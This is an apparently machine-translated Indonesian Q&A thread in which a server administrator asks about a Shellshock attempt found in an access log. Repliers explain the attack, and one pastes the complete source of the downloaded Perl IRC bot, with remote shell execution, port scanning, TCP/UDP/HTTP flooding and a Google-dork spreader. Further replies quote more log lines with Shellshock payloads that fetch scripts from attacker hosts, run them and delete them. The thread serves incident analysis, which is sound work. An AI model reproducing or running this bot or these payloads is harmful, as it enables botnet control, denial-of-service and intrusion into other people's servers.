Apakah ini serangan atau sesuatu yang perlu dikhawatirkan? Shellshock?

Lihat ini di access.logpada server pengujian saya:

> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

Tidak ada alamat yang terkait dengan saya atau rentang IP kami (atau hal lainnya) yang langsung berpikir tentang bug keamanan Shellshock / "bashdoor".

Ini benar-benar terlihat seperti seseorang telah mencoba curl"sesuatu" ke server, kemudian mengeksekusi "sesuatu" dan setelah itu menghapus "sesuatu" dengan -rf.

Ini adalah server uji murni, tidak ada salahnya dilakukan (== tidak ada salahnya dapat dilakukan selain menginstal ulang) - tetapi waktunya sangat menarik. Belum pernah melihat yang seperti ini sebelumnya, sejauh yang saya ingat.

Haruskah saya khawatir, misalnya "tertarik"? Adakah yang tahu tentang apa ini?

Itu adalah seseorang yang mengeksploitasi bug Shellshock. Bisakah Anda menentukan apa yang dilakukan skrip perl? Ini benar-benar layak Anda coba. URL kedua yang digunakan mengembalikan 404, tetapi http://213.5.67.223/jiada dan mungkin hal yang sama, mengingat itu adalah skrip perl. Tampaknya ini semacam server IRC, jadi menyambung ke server pengujian Anda dengan klien IRC mungkin terbukti menarik. EDIT: Komentar mengoreksi saya, ini adalah klien, sehingga mampu mengintip Anda.

Juga, periksa untuk melihat apakah skrip perl masih berjalan.

#!/usr/bin/perl
# ------------------------------------------------------------- #
#           LinuxNet perlbot            #
# ------------------------------------------------------------- #

#system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/atd |grep -v grep|awk '{print $1;}'`");

my $processo = '-';


my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];

my $linas_max='7';
my $sleep='7';
my @adms=("x","JB" );
my @hostauth=("localhost","outlaw");
my @canais=("#gnu");
my $nick='|GNU|';
my $ircname ='GNU';
chop (my $realname = `uname -sr`);
$servidor='ircd.w3h.co.uk' unless $servidor;
my $porta='443';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         } 
       }
    }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4; 
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}


sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");     
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); 
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
         my $itime = time;
         my ($cur_time);
             $cur_time = time - $itime;
         while ($3>$cur_time){
             $cur_time = time - $itime;
         &tcpflooder("$1","$2","$3");
             }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
           }
       if ($funcarg =~ /^version/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);           
        }
           if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
         srand;
         my $itime = time;
         my ($cur_time);
         my ($exploited);
         $boturl=$2;
             $cur_time = time - $itime;$exploited = 0;
        while($1>$cur_time){
            $cur_time = time - $itime;
            @urls=fetch();
            foreach $url (@urls) {
            $cur_time = time - $itime;
            my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;

            $url =$path."/$goni$boturl" ;




            $page = http_query($url);
            $exploited = $exploited + 1;
            }
        }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
           }
           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
         my $itime = time;
         my ($cur_time);
             $cur_time = time - $itime;
         while ($2>$cur_time){
             $cur_time = time - $itime;
         my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
         close($socket);
             }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
           }
           exit;
       }
  }
}

sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   } 

if ($case =~ /^refresh (.*)/) {
my $goni = $titi[rand scalar @titi];
 }

   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  } 
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}  
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(5)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
        "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
        "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
        "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
        "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
        "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
        "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
        "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",      
        "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
        "vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom  (@dominios)
{
    push (@str,"allinurl:%22".$dom."/".$goni."%22");
}

    my $query="www.google.com/search?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";


    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
    if ($1 !~ m/google|cache|translate/){
        push (@lst,$1);
    }
    }
    return (@lst);
}


sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;

    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
    local $SIG{ALRM} = sub { die "1";};
    alarm 10;
    my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
    print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
    my @r = <$sock>;
    $page="@r";
    alarm 0;
    close($sock);
    };    
    return $page;

}

Kerentanan Shellshock digunakan untuk mengunduh (menggunakan wget) dan menjalankan skrip Perl berbahaya, serangan ini sangat mendasar dan mengharuskan Perl dan wget untuk diinstal (dengan asumsi salah satunya tidak dan Anda yakin tidak ada upaya cracking lain, server Anda tidak dikompromikan).

Skrip itu sendiri adalah bot IRC skrip-kiddie dasar, setelah dijalankan bahwa crap terhubung ke server IRC dan menunggu perintah, sepertinya ia memiliki kemampuan pencarian Google di dalamnya, kemungkinan besar secara otomatis mencari host yang rentan dan berupaya untuk mengeksploitasinya. Selain itu, Anda tentu saja memiliki arsenal skiddie dasar, yang merupakan HTTP banjir, TCP dan UDP banjir dan akses shell (sebagai pengguna yang menjalankan skrip, yang akan menjadi pengguna di mana server HTTP berjalan sebagai).

Seperti yang disebutkan oleh orang lain, ini adalah upaya script-kiddie untuk mengeksploitasi kerentanan bash untuk mengeksekusi bot IRC berbasis skrip perl. Jika Anda memiliki bash yang diperbarui , dan di samping itu, jika Anda menjalankan apache di bawah chroot seperti saya, Anda tidak perlu khawatir. Saya melihat beberapa versi ini di log saya (lihat di bawah) setidaknya setiap hari sejak 9/27 ... ini hanya suara berisik.

12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""        
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""        
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""

Berbagai upaya eksekusi skrip (skrip python) yang baru saja saya perhatikan hari ini ... CATATAN: google-traffic-analytics.com di mana skrip python diunduh tidak ada hubungannya dengan Google, tentu saja.

cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""